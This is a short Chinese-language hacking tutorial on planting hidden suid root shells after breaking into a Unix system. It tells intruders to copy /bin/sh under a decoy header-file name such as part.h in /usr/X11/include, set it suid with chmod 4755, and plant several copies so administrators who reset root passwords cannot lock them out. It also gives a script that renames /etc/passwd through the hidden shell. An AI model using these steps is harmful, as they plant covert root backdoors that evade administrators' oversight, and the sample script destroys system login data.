什么是Suid Shell? Suid shell是一种可用于以拥有者权限运行的shell。也就是说,如果拥有者 是root,那你就可能以root的 身份执行命令。普通的shell文件属性为rwxr-xr-x,拥有者为root,root可读/写 /执行这个shell,而其他用户 则只能以自己的权限读和运行它。然而,如果有一个文件属性为rwsr-xr-x的she ll,就可以获得文件拥有者权 限;如果文件拥有者是root,那么任何运行了这个shell的用户便可以控制整个系 统,如增加用户、修改root口 令、清除日志等等。 为什么需要它? 这是一个非常容易回答的问题。当通过某些方法进入系统后,如果系统管理 员有一定的水平,会很快发现 问题。通常他们会查看日志和修改root口令,你可能就要跟这个系统说再见了。 这就是需要suid shell的原因 。:) 怎样才能得到suid shell呢? 首先你要足够狡猾,这取决于你面对的是什么样的系统管理员。当你用尽一 切方法,如猜口令、苦难root 、 安全漏洞攻击等等,终于成功地取得了root权限,尽快找到一个几乎从未使用过 的目录。无论如何,不要将 suid shell放在你的主目录下。一个比较好的地方是/usr下的深层子目录,如/u sr/X11/include/X11/。这个目 录几乎不会有人进去的,而且很少会因存放过多文件而使系统管理员检查里面的 文件。另外,suid shell的名 字应该尽量与其它文件相似。例如,在这个目录下有sync.h、shape.h等文件,s uid shell可以取part.h这种隐 蔽性较好的名字。 另一个比较好的地方是将suid shell与其它suid程序放置在一起,如/usr/s bin,并同样取一个隐蔽的名字。 接着,就是在这些目录下创建suid shell了。如: cp /bin/sh /usr/X11/include/X11/extensions/part.h chmod 4755 /usr/X11/include/X11/extensions/part.h 注意,为了使整个过程在最短的时间内完成,应该在进入系统前做好相应准 备。最好在尝试攻击前仔细研 究系统和计划。另外总是多创建几个suid shell,这样即使其中一个被发现了, 仍然有通过使用其它 suid shell控制系统的机会。 如何利用suid shell呢? 在许多系统中,往往限制用户所能使用的shell。这个只要检查一下/etc下的 相应文件就能知道。在Linux 系统中这个文件是/etc/shells,其中列出了所有的shell程序。但你可以用suid shell做任何事!例如,你准 备将/etc/passwd改名为/etc/passwd.heh,编写如下脚本即可: #!/usr/X11/include/X11/extensions/part.h mv /etc/passwd /etc/passwd.heh exit (这只是个示例,最好别这样做:)) 上面的例子好象只提供了一个非交互的程序,但只要精心编写脚本,同样可 以实现虚拟的“交互”程序。